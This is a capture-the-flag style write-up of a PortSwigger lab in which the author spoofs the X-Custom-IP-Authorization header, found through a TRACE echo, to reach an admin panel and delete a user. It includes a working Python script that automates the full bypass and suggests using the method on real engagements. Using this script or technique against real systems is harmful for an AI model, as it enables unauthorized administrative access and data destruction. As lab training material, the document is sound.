Authentication bypass via information disclosure

https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-authentication-bypass

Description

This lab's administration interface has an authentication bypass vulnerability, but it is impractical to exploit without knowledge of a custom HTTP header used by the front-end.

To solve the lab, obtain the header name then use it to bypass the lab's authentication. Access the admin interface and delete the user carlos.

You can log in to your own account using the following credentials: wiener:peter

Solution

Start by logging in as wiener at https://0ae80062039d9b5194f2429800130047.web-security-academy.net/login

The page source contains nothing of interest, so we try the admin page directly by appending /admin to the URL: https://0a160012030fde108045dab900300013.web-security-academy.net/admin

and we can see this information disclosure message: "Admin interface only available to local users"

So we send the /admin request to Burp Repeater and analyze it to learn more.

We can change the request method to see whether the response changes.

Sending the same request with the TRACE method returns a 200 response.

TRACE is a diagnostic method: the server echoes the request it received back in the response body. That echo includes a header we never sent, which the front-end added before forwarding the request: X-Custom-IP-Authorization: 37.101.171.137

Since the back-end trusts this header as the client's IP, we add it to our own request with a loopback address, X-Custom-IP-Authorization: 127.0.0.1, and switch the method back to GET.

Now the admin panel loads, and it lets us delete the user carlos.

Inspecting the response, there is a link that deletes carlos's account: GET /admin/delete?username=carlos

Change the request path to that URL, keeping the X-Custom-IP-Authorization: 127.0.0.1 header in place, and send it to delete the account and solve the lab.
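The same chain scripted outside Burp, as an added example that is not part of the original writeup or of the lab. It assumes the lab hostname, a valid session cookie for wiener, and that the front-end echoes the injected header in the TRACE body exactly as seen above; the TRACE body embedded in the script is constructed for offline testing, not captured from the lab. The detection logic is slightly more general than the writeup: rather than hard-coding the header name, it diffs the echoed headers against the ones we sent and keeps any unexpected header whose value looks like an IPv4 address.

```python
"""Lab chain: TRACE /admin to reveal the front-end's IP header, then
replay GET /admin and GET /admin/delete?username=carlos with that header
set to 127.0.0.1. Added example, not the lab's or the author's code.
"""
import re
import sys
import urllib.error
import urllib.request
from typing import Dict, Set, Tuple

# Constructed TRACE echo body for offline use (not captured from the lab).
# A real echo is the request exactly as the back-end received it.
SAMPLE_TRACE_BODY = """TRACE /admin HTTP/1.1
Host: 0a160012030fde108045dab900300013.web-security-academy.net
Cookie: session=abc123
X-Custom-IP-Authorization: 37.101.171.137
"""

IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def parse_echoed_headers(body: str) -> Dict[str, str]:
    """Parse the request echoed by TRACE into a header name -> value map.

    Skips the request line and stops at the blank line ending the headers.
    """
    headers: Dict[str, str] = {}
    for line in body.splitlines()[1:]:
        if not line.strip():
            break
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip()] = value.strip()
    return headers


def find_injected_ip_headers(echoed: Dict[str, str], sent: Set[str]) -> Dict[str, str]:
    """Return headers the front-end added (not in `sent`) whose value is an IPv4 address."""
    sent_lower = {h.lower() for h in sent}
    return {n: v for n, v in echoed.items()
            if n.lower() not in sent_lower and IPV4.match(v)}


def http(method: str, url: str, headers: Dict[str, str]) -> Tuple[int, str]:
    """Send one request and return (status, body); 4xx/5xx are returned, not raised."""
    req = urllib.request.Request(url, headers=headers, method=method)
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode(errors="replace")


def solve(base_url: str, session: str) -> int:
    """Run the full chain against a lab instance; returns the status of the delete request."""
    cookie = f"session={session}"
    status, body = http("TRACE", f"{base_url}/admin", {"Cookie": cookie})
    echoed = parse_echoed_headers(body)
    # urllib adds these itself, so they are expected in the echo.
    sent = {"Cookie", "Host", "User-Agent", "Connection", "Accept-Encoding"}
    injected = find_injected_ip_headers(echoed, sent)
    if not injected:
        raise SystemExit(f"no injected IP header in TRACE echo (status {status})")
    header_name = next(iter(injected))
    bypass = {"Cookie": cookie, header_name: "127.0.0.1"}  # spoof a local client
    status, _ = http("GET", f"{base_url}/admin", bypass)
    if status != 200:
        raise SystemExit(f"admin panel still refused us with {header_name} (status {status})")
    status, _ = http("GET", f"{base_url}/admin/delete?username=carlos", bypass)
    return status


if __name__ == "__main__":
    if len(sys.argv) == 3:
        # usage: python solve.py https://<lab-id>.web-security-academy.net <session-cookie>
        print("delete request status:", solve(sys.argv[1], sys.argv[2]))
    else:
        # Offline demo on the constructed echo body.
        found = find_injected_ip_headers(parse_echoed_headers(SAMPLE_TRACE_BODY),
                                         {"Host", "Cookie"})
        print("injected header(s):", found)
```

The header diff is the point worth keeping: the lab tells you the header name, but on a real engagement the useful signal is any header in the echo that you did not send, and an IP-shaped value is the usual tell for a front-end that has moved the "is this request local?" decision into a client-controllable field.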
